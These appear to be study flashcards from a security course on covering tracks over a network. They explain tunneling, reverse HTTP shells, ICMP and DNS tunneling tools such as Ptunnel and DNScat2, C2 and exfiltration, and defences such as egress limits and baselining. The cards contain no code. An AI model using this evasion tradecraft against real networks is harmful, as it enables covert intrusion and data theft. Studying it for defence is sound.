Book 5: Covering Tracks on the Network Flashcards
What is the most common way for an attacker to hide information as it is transmitted across a network?
tunneling
pg 81 book 5
What is tunneling?
one protocol carried inside another protocol.
pg 81 book 5.
If use tunneling, what protocol will the network see?
Network sees only second protocol.
Example: “shell traffic inside ICMP packets” network would only see the ICMP packet.
pg 81 book 5.
If the host protocol being used to tunnel/transport the info is allowed to run, then the protocol inside like shell traffic will be able to traverse the network?
true
pg 81 book 5
Tunnel sender side contains?
Tunnel receiver side contains?
server side: information to put into the tunnel
reciever side: envelope opened and info is removed from the tunnel.
pg 81 book 5
How can attackers evade detection?
Tunneling information. a more complex method to evaluate and identify.
pg 81 book 5
What ways can an attacker tunnel data to evade detection and cover their tracks?
Tunneling via
- Reverse HTTP/HTTPS Shells
- ICMP Tunnels : Ptunnel tool
- DNS Tunnels: DNScat2 tool
- By blending in
Would an attacker want to establish a backdoor using protocols that are common for the network? if so, give example.
Yes.
example: HTTP.
More:
1. Establish a backdoor using protocols that are common for network
2. Exploit a system, start some sort of command and control mechanism
3. Attacker once compromises a system will need to figure out what protocol to use for c2
4. can compromise the internal machine to make internal HTTP requiests out to my attacker server(CC mechanism)
Reverse HTTP is done over both ___ and ___ HTTP channels.
insecure and secure
pg 82 book 5
How would reverse HTTP/HTTPs shells work?
at predetermined intervals the HTTP program on the internal system will surds the internet asking for commands from the attackers external machine.
Attacker types commands at the external machine on the internet and sends the commands back to the victim machine as HTTP responses.
Are you safe from Reverse HTTP/HTTPS tunneling if you require HTTP authentication with static passwords?
no. you are not safe if you require HTTP authentication with static passwords to get out of your firewall.
Reverse HTTP shells allow for the attacker to program the system with a user ID and passsword that will be given to the outgoing web proxy firewall for authentication.
True.
Name the tool that carries data inside the payloads of ICMP packets?
Ptunnel
What is Ptunnel?
ICMP tunneling tool that carries TCP connections inside ICMP Echo and ICMP Echo Reply packets.
Do alot of networks allow outbound ICMP Echo packets and their associated responses?
Yes.
what is Loki?
Tool that carries shell between its Linux client adn Linux server software using ICMP echo and reply packets.
What is ICMPShell?
Linux Shell Tool
Ptunnel is best used on a network that blocks out __ and __ packets but allows you to ping arbitrary hosts on the internet.
TCP and UDP.
Ptunnel consists of how many components?
two. Ptunnel client and Ptunnel proxy
Ptunnel proxy can be configured to authenticate the Ptunnel client using what kind of authentication algorithm?
MD5 based challenge/response
The Ptunnel client and the Ptunnel proxy are the two main components of ___ tunneling.
ICMP tunneling.
What is the tool used for DNS tunneling?
DNSCat2
DNS Tunneling/ DNSCat2 is similar to what?
Netcat
How is DNS Tunneling/DNSCat2 similar to netcat but differs?
similar, but unlike netcat DNS tunneling does NOT directly talk to the attacker server; instead it uses the victim network infrastructure to relay the malicious content, bypassing many different filtering mechanisms
Netcat will talk directly to the attacker server?
DNS tunneling will talk to the victim network to then relay the malicious content?
true.
Netcat talks directly to the attacker server and DNS tunneling does not/
true.
What would prevent an attacker to reach a C2 system directly on the network?
blocked egress ports, authentication-required HTTP proxies
How does DNS tunneling work?
attacker does not directly talk to a DNS server on the internet; instead the attacker queries the internal DNS server, using crafted query data that the internal DNS server then sends to root-level DNS servers on the internet. The root level DNS servers then foward the queries to the attacker-controlled DNS server. which extracts the crafted query and performs an action on the attacker supplied data.
Does DNS tunneling talk directly to a DNS server on the internet?
No. talks to the internal DNS server
DNS tunneling Process victim –> ____ –> firewall –> root level DNS Server –> …. –> ____
Internal DNS server
Attacker Server
What is DNS?
Translates domain names to IP addresses so browsers can load internet resources.
Extra: detecting DNS?
look for unusual data being sent back and forth using statistical techniques. Looking at the number of DNS domain requests compared to the normal baseline
What isDNSCat2?
A DNS tunnel that creates an encrypted C2 channel to let you upload/download files, run a shell, etc
DNSCat2 is an implementation of __ tunneling consisting of an attacker process that partially implements the DNS server protocol and a ___ for Linux or windows victims.
DNS
client
DNSCat3 implements DNS tunneling attack, providing __ like functionality over ___. While also providing __ and end-to-end transport encryption.
netcat
DNS.
authentication.
What can attacker do when dnscat2 is successful?
upload and download files, execute local system commands, set up new local listening ports for remote networking…etc
DNSCat2 is a a popular command & control (C2) mechanism, even though it is easy to spot?
true.
Other mechanism used to exfil data or establish a c2?
email, messaging tools, social media sites, cloud services….etc
How could we prepare for protecting our network?
endpoint security tools, app whitelisting, UEBA tools.
Limit egress network protocol access, use authenticated proxy access for internet resources access vs direct unauthenticated access.
A strong defense against c2 frameworks?
using authenticated proxy access for internet resource access vs direct unauthenticated access.
How could we identify attackers using tunneling?
understand what’s on our network and systems look like to perform threat hunting.
spend time identifying which processes are running on systems, kind of network activity that is “normal” use a baseline to compare.
React to unauthorized netwrok egress access attempts.
Good technique to identifying tunneling- anomalous network activity
RITA - real intelligence threat analytics
What is RITA?
a sophisticated network analysis tool
Are IDS a useful technique to detect C2 and exfil techniques?
no. lack insight into encrypted streams, blended protocols.
